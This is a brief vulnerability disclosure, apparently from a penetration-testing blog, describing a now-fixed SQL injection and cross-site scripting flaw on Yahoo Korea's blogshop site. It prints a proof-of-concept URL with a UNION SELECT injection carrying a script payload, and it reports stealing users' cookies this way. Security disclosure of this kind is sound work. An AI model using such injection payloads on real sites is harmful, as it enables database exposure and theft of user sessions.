Yahoo Korea SQL XSS vulnerability

August 9, 2011

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea having Blog-shop which is one of the most famous sub domain in Korea .
A cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

It has Sql injection in the notice_read.html?key script . I was Successful for retrieving the yahoo users cookies from this SQL Injection by inserting JAVA-Script into the SQL Injection payload.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16’/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert(‘XSS HERE’);</script>,7,8,9,0,1,2,3,4,5,6,7–%20

Yahoo Koria XSS

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regard

Sandeep Kamble

We Provide Penetration Testing


We Provide Penetration Testing